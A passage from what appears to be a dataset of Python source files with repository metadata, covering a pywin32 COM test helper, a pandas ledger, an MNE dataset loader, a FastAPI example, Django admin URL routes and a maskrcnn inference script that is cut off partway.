os.remove(output_name)
class Failed(Exception): pass
try:
if rc:
raise Failed("exit code was " + str(rc))
if expected_output is not None and output != expected_output:
raise Failed("Expected output %r (got %r)" % (expected_output, output))
if not tracebacks_ok and \
output.find("Traceback (most recent call last)")>=0:
raise Failed("traceback in program output")
return output
except Failed, why:
print "Failed to exec command '%r'" % cmd
print "Failed as", why
print "** start of program output **"
print output
print "** end of program output **"
testcase.fail("Executing '%s' failed as %s" % (cmd, why))
def assertRaisesCOM_HRESULT(testcase, hresult, func, *args, **kw):
try:
func(*args, **kw)
except pythoncom.com_error, details:
if details.hresult==hresult:
return
testcase.fail("Excepected COM exception with HRESULT 0x%x" % hresult)
class CaptureWriter:
def __init__(self):
self.old_err = self.old_out = None
self.clear()
def capture(self):
self.clear()
self.old_out = sys.stdout
self.old_err = sys.stderr
sys.stdout = sys.stderr = self
def release(self):
if self.old_out:
sys.stdout = self.old_out
self.old_out = None
if self.old_err:
sys.stderr = self.old_err
self.old_err = None
def clear(self):
self.captured = []
def write(self, msg):
self.captured.append(msg)
def get_captured(self):
return "".join(self.captured)
def get_num_lines_captured(self):
return len("".join(self.captured).split("\n"))
# Utilities to set the win32com logger to something what just captures
# records written and doesn't print them.
class LogHandler(logging.Handler):
def __init__(self):
self.emitted = []
logging.Handler.__init__(self)
def emit(self, record):
self.emitted.append(record)
_win32com_logger = None
def setup_test_logger():
old_log = getattr(win32com, "logger", None)
global _win32com_logger
if _win32com_logger is None:
_win32com_logger = logging.Logger('test')
handler = LogHandler()
_win32com_logger.addHandler(handler)
win32com.logger = _win32com_logger
handler = _win32com_logger.handlers[0]
handler.emitted = []
return handler.emitted, old_log
def restore_test_logger(prev_logger):
assert prev_logger is None, "who needs this?"
if prev_logger is None:
del win32com.logger
else:
win32com.logger = prev_logger
# We used to override some of this (and may later!)
TestCase = unittest.TestCase
def CapturingFunctionTestCase(*args, **kw):
real_test = _CapturingFunctionTestCase(*args, **kw)
return LeakTestCase(real_test)
class _CapturingFunctionTestCase(unittest.FunctionTestCase):#, TestCaseMixin):
def __call__(self, result=None):
if result is None: result = self.defaultTestResult()
writer = CaptureWriter()
#self._preTest()
writer.capture()
try:
unittest.FunctionTestCase.__call__(self, result)
if getattr(self, "do_leak_tests", 0) and hasattr(sys, "gettotalrefcount"):
self.run_leak_tests(result)
finally:
writer.release()
#self._postTest(result)
output = writer.get_captured()
self.checkOutput(output, result)
if result.showAll:
print output
def checkOutput(self, output, result):
if output.find("Traceback")>=0:
msg = "Test output contained a traceback\n---\n%s\n---" % output
result.errors.append((self, msg))
class ShellTestCase(unittest.TestCase):
def __init__(self, cmd, expected_output):
self.__cmd = cmd
self.__eo = expected_output
unittest.TestCase.__init__(self)
def runTest(self):
ExecuteShellCommand(self.__cmd, self, self.__eo)
def __str__(self):
max = 30
if len(self.__cmd)>max:
cmd_repr = self.__cmd[:max] + "..."
else:
cmd_repr = self.__cmd
return "exec: " + cmd_repr
def testmain(*args, **kw):
pywin32_testutil.testmain(*args, **kw)
CheckClean()
| 35.433628 | 100 | 0.61988 | import sys, os
import win32api
import tempfile
import unittest
import gc
import pywintypes
import pythoncom
import winerror
from pythoncom import _GetInterfaceCount, _GetGatewayCount
import win32com
import logging
import _winreg
import cStringIO as StringIO
import pywin32_testutil
from pywin32_testutil import TestLoader, TestResult, TestRunner, LeakTestCase
def CheckClean():
try:
sys.exc_clear()
except AttributeError:
pass
c = _GetInterfaceCount()
if c:
print "Warning - %d com interface objects still alive" % c
c = _GetGatewayCount()
if c:
print "Warning - %d com gateway objects still alive" % c
def RegisterPythonServer(filename, progids=None, verbose=0):
if progids:
if isinstance(progids, basestring):
progids = [progids]
why_not = None
for progid in progids:
clsid = pywintypes.IID(progid)
try:
HKCR = _winreg.HKEY_CLASSES_ROOT
hk = _winreg.OpenKey(HKCR, "CLSID\\%s" % clsid)
dll = _winreg.QueryValue(hk, "InprocServer32")
except WindowsError:
break
ok_files = [os.path.basename(pythoncom.__file__),
'pythoncomloader%d%d.dll' % (sys.version_info[0], sys.version_info[1])]
if os.path.basename(dll) not in ok_files:
why_not = "%r is registered against a different Python version (%s)" % (progid, dll)
break
else:
return
try:
from win32com.shell.shell import IsUserAnAdmin
except ImportError:
print "Can't import win32com.shell - no idea if you are an admin or not?"
is_admin = False
else:
try:
is_admin = IsUserAnAdmin()
except pythoncom.com_error:
# old, less-secure OS - assume *is* admin.
is_admin = True
if not is_admin:
msg = "%r isn't registered, but I'm not an administrator who can register it." % progids[0]
if why_not:
msg += "\n(registration check failed as %s)" % why_not
# throw a normal "class not registered" exception - we don't report
raise pythoncom.com_error(winerror.CO_E_CLASSSTRING, msg, None, -1)
cmd = '%s "%s" --unattended > nul 2>&1' % (win32api.GetModuleFileName(0), filename)
if verbose:
print "Registering engine", filename
rc = os.system(cmd)
if rc:
print "Registration command was:"
print cmd
raise RuntimeError("Registration of engine '%s' failed" % filename)
def ExecuteShellCommand(cmd, testcase,
expected_output = None,
tracebacks_ok = 0,
):
output_name = tempfile.mktemp('win32com_test')
cmd = cmd + ' > "%s" 2>&1' % output_name
rc = os.system(cmd)
output = open(output_name, "r").read().strip()
os.remove(output_name)
class Failed(Exception): pass
try:
if rc:
raise Failed("exit code was " + str(rc))
if expected_output is not None and output != expected_output:
raise Failed("Expected output %r (got %r)" % (expected_output, output))
if not tracebacks_ok and \
output.find("Traceback (most recent call last)")>=0:
raise Failed("traceback in program output")
return output
except Failed, why:
print "Failed to exec command '%r'" % cmd
print "Failed as", why
print "** start of program output **"
print output
print "** end of program output **"
testcase.fail("Executing '%s' failed as %s" % (cmd, why))
def assertRaisesCOM_HRESULT(testcase, hresult, func, *args, **kw):
try:
func(*args, **kw)
except pythoncom.com_error, details:
if details.hresult==hresult:
return
testcase.fail("Excepected COM exception with HRESULT 0x%x" % hresult)
class CaptureWriter:
def __init__(self):
self.old_err = self.old_out = None
self.clear()
def capture(self):
self.clear()
self.old_out = sys.stdout
self.old_err = sys.stderr
sys.stdout = sys.stderr = self
def release(self):
if self.old_out:
sys.stdout = self.old_out
self.old_out = None
if self.old_err:
sys.stderr = self.old_err
self.old_err = None
def clear(self):
self.captured = []
def write(self, msg):
self.captured.append(msg)
def get_captured(self):
return "".join(self.captured)
def get_num_lines_captured(self):
return len("".join(self.captured).split("\n"))
class LogHandler(logging.Handler):
def __init__(self):
self.emitted = []
logging.Handler.__init__(self)
def emit(self, record):
self.emitted.append(record)
_win32com_logger = None
def setup_test_logger():
old_log = getattr(win32com, "logger", None)
global _win32com_logger
if _win32com_logger is None:
_win32com_logger = logging.Logger('test')
handler = LogHandler()
_win32com_logger.addHandler(handler)
win32com.logger = _win32com_logger
handler = _win32com_logger.handlers[0]
handler.emitted = []
return handler.emitted, old_log
def restore_test_logger(prev_logger):
assert prev_logger is None, "who needs this?"
if prev_logger is None:
del win32com.logger
else:
win32com.logger = prev_logger
# We used to override some of this (and may later!)
TestCase = unittest.TestCase
def CapturingFunctionTestCase(*args, **kw):
real_test = _CapturingFunctionTestCase(*args, **kw)
return LeakTestCase(real_test)
class _CapturingFunctionTestCase(unittest.FunctionTestCase):#, TestCaseMixin):
def __call__(self, result=None):
if result is None: result = self.defaultTestResult()
writer = CaptureWriter()
#self._preTest()
writer.capture()
try:
unittest.FunctionTestCase.__call__(self, result)
if getattr(self, "do_leak_tests", 0) and hasattr(sys, "gettotalrefcount"):
self.run_leak_tests(result)
finally:
writer.release()
#self._postTest(result)
output = writer.get_captured()
self.checkOutput(output, result)
if result.showAll:
print output
def checkOutput(self, output, result):
if output.find("Traceback")>=0:
msg = "Test output contained a traceback\n---\n%s\n---" % output
result.errors.append((self, msg))
class ShellTestCase(unittest.TestCase):
def __init__(self, cmd, expected_output):
self.__cmd = cmd
self.__eo = expected_output
unittest.TestCase.__init__(self)
def runTest(self):
ExecuteShellCommand(self.__cmd, self, self.__eo)
def __str__(self):
max = 30
if len(self.__cmd)>max:
cmd_repr = self.__cmd[:max] + "..."
else:
cmd_repr = self.__cmd
return "exec: " + cmd_repr
def testmain(*args, **kw):
pywin32_testutil.testmain(*args, **kw)
CheckClean()
| false | true |
f72310316e69d5f9f95c4cfbe7fc3e21754a4391 | 1,029 | py | Python | ledger.py | HaeckelK/bookkeeping | 6f8b62f1322fe1c409f397222653382d302d9754 | [
"MIT"
] | null | null | null | ledger.py | HaeckelK/bookkeeping | 6f8b62f1322fe1c409f397222653382d302d9754 | [
"MIT"
] | 7 | 2021-06-30T12:05:47.000Z | 2021-07-14T07:50:27.000Z | ledger.py | HaeckelK/bookkeeping | 6f8b62f1322fe1c409f397222653382d302d9754 | [
"MIT"
] | null | null | null | from abc import ABC, abstractmethod
from typing import List
import numpy as np
class Ledger(ABC):
@abstractmethod
def get_next_batch_id(self) -> int:
"""Return next available batch id."""
@abstractmethod
def get_next_transaction_id(self) -> int:
"""Return next available transaction id."""
class PandasLedger(Ledger):
def get_next_batch_id(self) -> int:
try:
next_id = int(self.df["batch_id"].max()) + 1
except ValueError:
return 0
return next_id
def append(self, df) -> List[int]:
next_id = self.get_next_transaction_id()
ids = np.arange(start=next_id, stop=next_id + df.shape[0])
df["transaction_id"] = ids
self.df = self.df.append(df[self.columns], ignore_index=True, sort=False)
return list(ids)
def get_next_transaction_id(self) -> int:
try:
next_id = int(self.df["transaction_id"].max()) + 1
except ValueError:
return 0
return next_id
| 27.078947 | 81 | 0.616132 | from abc import ABC, abstractmethod
from typing import List
import numpy as np
class Ledger(ABC):
@abstractmethod
def get_next_batch_id(self) -> int:
@abstractmethod
def get_next_transaction_id(self) -> int:
class PandasLedger(Ledger):
def get_next_batch_id(self) -> int:
try:
next_id = int(self.df["batch_id"].max()) + 1
except ValueError:
return 0
return next_id
def append(self, df) -> List[int]:
next_id = self.get_next_transaction_id()
ids = np.arange(start=next_id, stop=next_id + df.shape[0])
df["transaction_id"] = ids
self.df = self.df.append(df[self.columns], ignore_index=True, sort=False)
return list(ids)
def get_next_transaction_id(self) -> int:
try:
next_id = int(self.df["transaction_id"].max()) + 1
except ValueError:
return 0
return next_id
| true | true |
f72310a1ea315b6aa985cf62ca1415bc2658bfc2 | 1,843 | py | Python | mne/datasets/kiloword/kiloword.py | fmamashli/mne-python | 52f064415e7c9fa8fe243d22108dcdf3d86505b9 | [
"BSD-3-Clause"
] | 3 | 2021-01-04T08:45:56.000Z | 2021-05-19T12:25:59.000Z | mne/datasets/kiloword/kiloword.py | fmamashli/mne-python | 52f064415e7c9fa8fe243d22108dcdf3d86505b9 | [
"BSD-3-Clause"
] | 28 | 2020-05-07T00:58:34.000Z | 2020-08-29T23:02:17.000Z | mne/datasets/kiloword/kiloword.py | fmamashli/mne-python | 52f064415e7c9fa8fe243d22108dcdf3d86505b9 | [
"BSD-3-Clause"
] | 3 | 2019-01-28T13:48:00.000Z | 2019-07-10T16:02:11.000Z | # License: BSD Style.
from ...utils import verbose
from ..utils import _data_path, _get_version, _version_doc
@verbose
def data_path(path=None, force_update=False, update_path=True, download=True,
verbose=None):
"""
Get path to local copy of the kiloword dataset.
This is the dataset from [1]_.
Parameters
----------
path : None | str
Location of where to look for the kiloword data storing
location. If None, the environment variable or config parameter
MNE_DATASETS_KILOWORD_PATH is used. If it doesn't exist,
the "mne-python/examples" directory is used. If the
kiloword dataset is not found under the given path (e.g.,
as "mne-python/examples/MNE-kiloword-data"), the data
will be automatically downloaded to the specified folder.
force_update : bool
Force update of the dataset even if a local copy exists.
update_path : bool | None
If True, set the MNE_DATASETS_KILOWORD_PATH in mne-python
config to the given path. If None, the user is prompted.
%(verbose)s
Returns
-------
path : list of str
Local path to the given data file. This path is contained inside a list
of length one, for compatibility.
References
----------
.. [1] Dufau, S., Grainger, J., Midgley, KJ., Holcomb, PJ. A thousand
words are worth a picture: Snapshots of printed-word processing in an
event-related potential megastudy. Psychological science, 2015
"""
return _data_path(path=path, force_update=force_update,
update_path=update_path, name='kiloword',
download=download)
def get_version():
"""Get dataset version."""
return _get_version('kiloword')
get_version.__doc__ = _version_doc.format(name='kiloword')
| 33.509091 | 79 | 0.661964 |
from ...utils import verbose
from ..utils import _data_path, _get_version, _version_doc
@verbose
def data_path(path=None, force_update=False, update_path=True, download=True,
verbose=None):
return _data_path(path=path, force_update=force_update,
update_path=update_path, name='kiloword',
download=download)
def get_version():
return _get_version('kiloword')
get_version.__doc__ = _version_doc.format(name='kiloword')
| true | true |
f723117022eb914a0585fd58463edf8df6b3fddf | 653 | py | Python | utils/src/utils/service_area.py | RoboHubEindhoven/suii_control | 312114ca878d8659e04a1ae8f1cfe7454dd9d060 | [
"BSD-3-Clause"
] | null | null | null | utils/src/utils/service_area.py | RoboHubEindhoven/suii_control | 312114ca878d8659e04a1ae8f1cfe7454dd9d060 | [
"BSD-3-Clause"
] | null | null | null | utils/src/utils/service_area.py | RoboHubEindhoven/suii_control | 312114ca878d8659e04a1ae8f1cfe7454dd9d060 | [
"BSD-3-Clause"
] | null | null | null | import yaml
class ServiceArea(yaml.YAMLObject):
yaml_loader = yaml.SafeLoader
yaml_tag = u'!ServiceArea'
def __init__(self, area_type, area_name, instance_id, description, orientation_id = None, orientation_name = None, position = None, orientation = None):
self.area_type = area_type
self.area_name = area_name
self.instance_id = instance_id
self.description = description
self.orientation_id = orientation_id
self.orientation_name = orientation_name
self.position = position
self.orientation = orientation
| 40.8125 | 156 | 0.635528 | import yaml
class ServiceArea(yaml.YAMLObject):
yaml_loader = yaml.SafeLoader
yaml_tag = u'!ServiceArea'
def __init__(self, area_type, area_name, instance_id, description, orientation_id = None, orientation_name = None, position = None, orientation = None):
self.area_type = area_type
self.area_name = area_name
self.instance_id = instance_id
self.description = description
self.orientation_id = orientation_id
self.orientation_name = orientation_name
self.position = position
self.orientation = orientation
| true | true |
f723119ca64212a227a145c49f797065bce9bf36 | 379 | py | Python | examples/fast_api/app.py | e-kor/yappa | 1ea3c4e6a5ffb7a3fbd02d810a62f73a13b9d649 | [
"MIT"
] | 41 | 2021-07-15T14:54:16.000Z | 2022-03-26T10:59:40.000Z | examples/fast_api/app.py | e-kor/yappa | 1ea3c4e6a5ffb7a3fbd02d810a62f73a13b9d649 | [
"MIT"
] | 29 | 2021-08-04T08:04:26.000Z | 2021-08-19T09:50:30.000Z | examples/fast_api/app.py | e-kor/yappa | 1ea3c4e6a5ffb7a3fbd02d810a62f73a13b9d649 | [
"MIT"
] | 3 | 2021-07-23T14:56:40.000Z | 2022-03-24T16:09:55.000Z | from fastapi import FastAPI
from pydantic import BaseModel
app = FastAPI()
@app.get('/')
def main():
return 'root url'
@app.get('/json')
def json():
return {
"result": "json",
"sub_result": {"sub": "json"}
}
class Request(BaseModel):
id: int
body: str
@app.post('/post')
def post(request: Request):
return request
| 13.535714 | 41 | 0.567282 | from fastapi import FastAPI
from pydantic import BaseModel
app = FastAPI()
@app.get('/')
def main():
return 'root url'
@app.get('/json')
def json():
return {
"result": "json",
"sub_result": {"sub": "json"}
}
class Request(BaseModel):
id: int
body: str
@app.post('/post')
def post(request: Request):
return request
| true | true |
f72311e46251fe6bd12e2879f883751994698f50 | 6,895 | py | Python | app/adminpanel/urls.py | prapeller/chinesebreak_django_drf | 48679bd67027a29eefc3c2e408d08fe2dff3ce0a | [
"MIT"
] | null | null | null | app/adminpanel/urls.py | prapeller/chinesebreak_django_drf | 48679bd67027a29eefc3c2e408d08fe2dff3ce0a | [
"MIT"
] | null | null | null | app/adminpanel/urls.py | prapeller/chinesebreak_django_drf | 48679bd67027a29eefc3c2e408d08fe2dff3ce0a | [
"MIT"
] | null | null | null | from django.urls import path
from adminpanel.views import (index,
WordCreateView, WordListView, WordUpdateView, WordDeleteView,
GrammarCreateView, GrammarListView, GrammarUpdateView, GrammarDeleteView,
LangCreateView, LangListView, LangUpdateView, LangDeleteView,
CourseCreateView, CourseUpdateView, CourseDeleteView,
TopicCreateView, TopicUpdateView, TopicDeleteView,
LessonCreateView, LessonUpdateView, LessonDeleteView,
TaskUpdateView,
task_update_with_ajax,
TaskType_1_UpdateView,
TaskType_2_UpdateView,
TaskType_3_UpdateView,
TaskType_4_UpdateView,
TaskType_5_UpdateView,
TaskType_6_UpdateView,
TaskType_7_UpdateView,
TaskType_8_UpdateView,
TaskType_9_UpdateView,
TaskType_10_UpdateView,
TaskType_11_UpdateView,
TaskType_12_UpdateView,
TaskType_13_UpdateView,
TaskType_14_UpdateView,
TaskType_15_UpdateView,
TaskType_16_UpdateView,
TaskType_17_UpdateView,
TaskType_18_UpdateView,
TaskType_19_UpdateView,
TaskType_20_UpdateView,
TaskType_21_UpdateView,
TaskType_22_UpdateView,
TaskType_23_UpdateView,
TaskDeleteView)
app_name = 'adminpanel'
urlpatterns = [
path('', index, name='index'),
path('elements/words/', WordListView.as_view(), name='word_list'),
path('elements/words/create', WordCreateView.as_view(), name='word_create'),
path('elements/words/update/<int:pk>/', WordUpdateView.as_view(), name='word_update'),
path('elements/words/delete/<int:pk>/', WordDeleteView.as_view(), name='word_delete'),
path('elements/grammars/', GrammarListView.as_view(), name='grammar_list'),
path('elements/grammars/create', GrammarCreateView.as_view(), name='grammar_create'),
path('elements/grammars/update/<int:pk>/', GrammarUpdateView.as_view(), name='grammar_update'),
path('elements/grammars/delete/<int:pk>/', GrammarDeleteView.as_view(), name='grammar_delete'),
path('structure/langs/', LangListView.as_view(), name='lang_list'),
path('structure/langs/create/', LangCreateView.as_view(), name='lang_create'),
path('structure/langs/update/<int:pk>/', LangUpdateView.as_view(), name='lang_update'),
path('structure/langs/delete/<int:pk>/', LangDeleteView.as_view(), name='lang_delete'),
path('structure/courses/create/', CourseCreateView.as_view(), name='course_create'),
path('structure/courses/update/<int:pk>/', CourseUpdateView.as_view(), name='course_update'),
path('structure/courses/delete/<int:pk>/', CourseDeleteView.as_view(), name='course_delete'),
path('structure/topics/create/', TopicCreateView.as_view(), name='topic_create'),
path('structure/topics/update/<int:pk>/', TopicUpdateView.as_view(), name='topic_update'),
path('structure/topics/delete/<int:pk>/', TopicDeleteView.as_view(), name='topic_delete'),
path('structure/lessons/create/', LessonCreateView.as_view(), name='lesson_create'),
path('structure/lessons/update/<int:pk>/', LessonUpdateView.as_view(), name='lesson_update'),
path('structure/lessons/delete/<int:pk>/', LessonDeleteView.as_view(), name='lesson_delete'),
path('structure/tasks/update/<int:pk>/', TaskUpdateView.as_view(), name='task_update'),
path('structure/tasks/update_with_ajax/<int:pk>/', task_update_with_ajax, name='task_update_with_ajax'),
path('structure/tasks/type_1/update/<int:pk>/', TaskType_1_UpdateView.as_view(), name='task_type_1_update'),
path('structure/tasks/type_2/update/<int:pk>/', TaskType_2_UpdateView.as_view(), name='task_type_2_update'),
path('structure/tasks/type_3/update/<int:pk>/', TaskType_3_UpdateView.as_view(), name='task_type_3_update'),
path('structure/tasks/type_4/update/<int:pk>/', TaskType_4_UpdateView.as_view(), name='task_type_4_update'),
path('structure/tasks/type_5/update/<int:pk>/', TaskType_5_UpdateView.as_view(), name='task_type_5_update'),
path('structure/tasks/type_6/update/<int:pk>/', TaskType_6_UpdateView.as_view(), name='task_type_6_update'),
path('structure/tasks/type_7/update/<int:pk>/', TaskType_7_UpdateView.as_view(), name='task_type_7_update'),
path('structure/tasks/type_8/update/<int:pk>/', TaskType_8_UpdateView.as_view(), name='task_type_8_update'),
path('structure/tasks/type_9/update/<int:pk>/', TaskType_9_UpdateView.as_view(), name='task_type_9_update'),
path('structure/tasks/type_10/update/<int:pk>/', TaskType_10_UpdateView.as_view(), name='task_type_10_update'),
path('structure/tasks/type_11/update/<int:pk>/', TaskType_11_UpdateView.as_view(), name='task_type_11_update'),
path('structure/tasks/type_12/update/<int:pk>/', TaskType_12_UpdateView.as_view(), name='task_type_12_update'),
path('structure/tasks/type_13/update/<int:pk>/', TaskType_13_UpdateView.as_view(), name='task_type_13_update'),
path('structure/tasks/type_14/update/<int:pk>/', TaskType_14_UpdateView.as_view(), name='task_type_14_update'),
path('structure/tasks/type_15/update/<int:pk>/', TaskType_15_UpdateView.as_view(), name='task_type_15_update'),
path('structure/tasks/type_16/update/<int:pk>/', TaskType_16_UpdateView.as_view(), name='task_type_16_update'),
path('structure/tasks/type_17/update/<int:pk>/', TaskType_17_UpdateView.as_view(), name='task_type_17_update'),
path('structure/tasks/type_18/update/<int:pk>/', TaskType_18_UpdateView.as_view(), name='task_type_18_update'),
path('structure/tasks/type_19/update/<int:pk>/', TaskType_19_UpdateView.as_view(), name='task_type_19_update'),
path('structure/tasks/type_20/update/<int:pk>/', TaskType_20_UpdateView.as_view(), name='task_type_20_update'),
path('structure/tasks/type_21/update/<int:pk>/', TaskType_21_UpdateView.as_view(), name='task_type_21_update'),
path('structure/tasks/type_22/update/<int:pk>/', TaskType_22_UpdateView.as_view(), name='task_type_22_update'),
path('structure/tasks/type_23/update/<int:pk>/', TaskType_23_UpdateView.as_view(), name='task_type_23_update'),
path('structure/tasks/delete/<int:pk>/', TaskDeleteView.as_view(), name='task_delete'),
]
| 68.95 | 115 | 0.658013 | from django.urls import path
from adminpanel.views import (index,
WordCreateView, WordListView, WordUpdateView, WordDeleteView,
GrammarCreateView, GrammarListView, GrammarUpdateView, GrammarDeleteView,
LangCreateView, LangListView, LangUpdateView, LangDeleteView,
CourseCreateView, CourseUpdateView, CourseDeleteView,
TopicCreateView, TopicUpdateView, TopicDeleteView,
LessonCreateView, LessonUpdateView, LessonDeleteView,
TaskUpdateView,
task_update_with_ajax,
TaskType_1_UpdateView,
TaskType_2_UpdateView,
TaskType_3_UpdateView,
TaskType_4_UpdateView,
TaskType_5_UpdateView,
TaskType_6_UpdateView,
TaskType_7_UpdateView,
TaskType_8_UpdateView,
TaskType_9_UpdateView,
TaskType_10_UpdateView,
TaskType_11_UpdateView,
TaskType_12_UpdateView,
TaskType_13_UpdateView,
TaskType_14_UpdateView,
TaskType_15_UpdateView,
TaskType_16_UpdateView,
TaskType_17_UpdateView,
TaskType_18_UpdateView,
TaskType_19_UpdateView,
TaskType_20_UpdateView,
TaskType_21_UpdateView,
TaskType_22_UpdateView,
TaskType_23_UpdateView,
TaskDeleteView)
app_name = 'adminpanel'
urlpatterns = [
path('', index, name='index'),
path('elements/words/', WordListView.as_view(), name='word_list'),
path('elements/words/create', WordCreateView.as_view(), name='word_create'),
path('elements/words/update/<int:pk>/', WordUpdateView.as_view(), name='word_update'),
path('elements/words/delete/<int:pk>/', WordDeleteView.as_view(), name='word_delete'),
path('elements/grammars/', GrammarListView.as_view(), name='grammar_list'),
path('elements/grammars/create', GrammarCreateView.as_view(), name='grammar_create'),
path('elements/grammars/update/<int:pk>/', GrammarUpdateView.as_view(), name='grammar_update'),
path('elements/grammars/delete/<int:pk>/', GrammarDeleteView.as_view(), name='grammar_delete'),
path('structure/langs/', LangListView.as_view(), name='lang_list'),
path('structure/langs/create/', LangCreateView.as_view(), name='lang_create'),
path('structure/langs/update/<int:pk>/', LangUpdateView.as_view(), name='lang_update'),
path('structure/langs/delete/<int:pk>/', LangDeleteView.as_view(), name='lang_delete'),
path('structure/courses/create/', CourseCreateView.as_view(), name='course_create'),
path('structure/courses/update/<int:pk>/', CourseUpdateView.as_view(), name='course_update'),
path('structure/courses/delete/<int:pk>/', CourseDeleteView.as_view(), name='course_delete'),
path('structure/topics/create/', TopicCreateView.as_view(), name='topic_create'),
path('structure/topics/update/<int:pk>/', TopicUpdateView.as_view(), name='topic_update'),
path('structure/topics/delete/<int:pk>/', TopicDeleteView.as_view(), name='topic_delete'),
path('structure/lessons/create/', LessonCreateView.as_view(), name='lesson_create'),
path('structure/lessons/update/<int:pk>/', LessonUpdateView.as_view(), name='lesson_update'),
path('structure/lessons/delete/<int:pk>/', LessonDeleteView.as_view(), name='lesson_delete'),
path('structure/tasks/update/<int:pk>/', TaskUpdateView.as_view(), name='task_update'),
path('structure/tasks/update_with_ajax/<int:pk>/', task_update_with_ajax, name='task_update_with_ajax'),
path('structure/tasks/type_1/update/<int:pk>/', TaskType_1_UpdateView.as_view(), name='task_type_1_update'),
path('structure/tasks/type_2/update/<int:pk>/', TaskType_2_UpdateView.as_view(), name='task_type_2_update'),
path('structure/tasks/type_3/update/<int:pk>/', TaskType_3_UpdateView.as_view(), name='task_type_3_update'),
path('structure/tasks/type_4/update/<int:pk>/', TaskType_4_UpdateView.as_view(), name='task_type_4_update'),
path('structure/tasks/type_5/update/<int:pk>/', TaskType_5_UpdateView.as_view(), name='task_type_5_update'),
path('structure/tasks/type_6/update/<int:pk>/', TaskType_6_UpdateView.as_view(), name='task_type_6_update'),
path('structure/tasks/type_7/update/<int:pk>/', TaskType_7_UpdateView.as_view(), name='task_type_7_update'),
path('structure/tasks/type_8/update/<int:pk>/', TaskType_8_UpdateView.as_view(), name='task_type_8_update'),
path('structure/tasks/type_9/update/<int:pk>/', TaskType_9_UpdateView.as_view(), name='task_type_9_update'),
path('structure/tasks/type_10/update/<int:pk>/', TaskType_10_UpdateView.as_view(), name='task_type_10_update'),
path('structure/tasks/type_11/update/<int:pk>/', TaskType_11_UpdateView.as_view(), name='task_type_11_update'),
path('structure/tasks/type_12/update/<int:pk>/', TaskType_12_UpdateView.as_view(), name='task_type_12_update'),
path('structure/tasks/type_13/update/<int:pk>/', TaskType_13_UpdateView.as_view(), name='task_type_13_update'),
path('structure/tasks/type_14/update/<int:pk>/', TaskType_14_UpdateView.as_view(), name='task_type_14_update'),
path('structure/tasks/type_15/update/<int:pk>/', TaskType_15_UpdateView.as_view(), name='task_type_15_update'),
path('structure/tasks/type_16/update/<int:pk>/', TaskType_16_UpdateView.as_view(), name='task_type_16_update'),
path('structure/tasks/type_17/update/<int:pk>/', TaskType_17_UpdateView.as_view(), name='task_type_17_update'),
path('structure/tasks/type_18/update/<int:pk>/', TaskType_18_UpdateView.as_view(), name='task_type_18_update'),
path('structure/tasks/type_19/update/<int:pk>/', TaskType_19_UpdateView.as_view(), name='task_type_19_update'),
path('structure/tasks/type_20/update/<int:pk>/', TaskType_20_UpdateView.as_view(), name='task_type_20_update'),
path('structure/tasks/type_21/update/<int:pk>/', TaskType_21_UpdateView.as_view(), name='task_type_21_update'),
path('structure/tasks/type_22/update/<int:pk>/', TaskType_22_UpdateView.as_view(), name='task_type_22_update'),
path('structure/tasks/type_23/update/<int:pk>/', TaskType_23_UpdateView.as_view(), name='task_type_23_update'),
path('structure/tasks/delete/<int:pk>/', TaskDeleteView.as_view(), name='task_delete'),
]
| true | true |
f723120659cd05c6e7b6ba54ecc282693e50d44a | 4,157 | py | Python | object_detection/pytorch/tools/test_net.py | lamyiowce/training | da4c959b5a7b65091b850872cdd4014d768c087c | [
"Apache-2.0"
] | 567 | 2018-09-13T05:07:49.000Z | 2020-11-23T11:52:11.000Z | object_detection/pytorch/tools/test_net.py | lamyiowce/training | da4c959b5a7b65091b850872cdd4014d768c087c | [
"Apache-2.0"
] | 222 | 2018-09-14T10:15:39.000Z | 2020-11-20T22:21:09.000Z | object_detection/pytorch/tools/test_net.py | ltechkorea/mlperf-training | 498b945dd914573bdbf7a871eaeebd9388b60b76 | [
"Apache-2.0"
] | 279 | 2018-09-16T12:40:29.000Z | 2020-11-17T14:22:52.000Z | # Copyright (c) 2021, NVIDIA CORPORATION. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Copyright (c) Facebook, Inc. and its affiliates. All Rights Reserved.
# Set up custom environment before nearly anything else is imported
# NOTE: this should be the first import (no not reorder)
from maskrcnn_benchmark.utils.env import setup_environment # noqa F401 isort:skip
import argparse
import os
import torch
from maskrcnn_benchmark.config import cfg
from maskrcnn_benchmark.data import make_data_loader
from maskrcnn_benchmark.engine.inference import inference
from maskrcnn_benchmark.modeling.detector import build_detection_model
from maskrcnn_benchmark.utils.checkpoint import DetectronCheckpointer
from maskrcnn_benchmark.utils.collect_env import collect_env_info
from maskrcnn_benchmark.utils.comm import synchronize, get_rank
from maskrcnn_benchmark.utils.logger import setup_logger
from maskrcnn_benchmark.utils.miscellaneous import mkdir
def main():
parser = argparse.ArgumentParser(description="PyTorch Object Detection Inference")
parser.add_argument(
"--config-file",
default="/private/home/fmassa/github/detectron.pytorch_v2/configs/e2e_faster_rcnn_R_50_C4_1x_caffe2.yaml",
metavar="FILE",
help="path to config file",
)
parser.add_argument("--local_rank", type=int, default=0)
parser.add_argument(
"opts",
help="Modify config options using the command-line",
default=None,
nargs=argparse.REMAINDER,
)
args = parser.parse_args()
num_gpus = int(os.environ["WORLD_SIZE"]) if "WORLD_SIZE" in os.environ else 1
distributed = num_gpus > 1
if distributed:
torch.cuda.set_device(args.local_rank)
torch.distributed.init_process_group(
backend="nccl", init_method="env://"
)
synchronize()
cfg.merge_from_file(args.config_file)
cfg.merge_from_list(args.opts)
cfg.freeze()
save_dir = ""
logger = setup_logger("maskrcnn_benchmark", save_dir, get_rank())
logger.info("Using {} GPUs".format(num_gpus))
logger.info(cfg)
logger.info("Collecting env info (might take some time)")
logger.info("\n" + collect_env_info())
model = build_detection_model(cfg)
model.to(cfg.MODEL.DEVICE)
output_dir = cfg.OUTPUT_DIR
checkpointer = DetectronCheckpointer(cfg, model, save_dir=output_dir)
_ = checkpointer.load(cfg.MODEL.WEIGHT)
iou_types = ("bbox",)
if cfg.MODEL.MASK_ON:
iou_types = iou_types + ("segm",)
if cfg.MODEL.KEYPOINT_ON:
iou_types = iou_types + ("keypoints",)
output_folders = [None] * len(cfg.DATASETS.TEST)
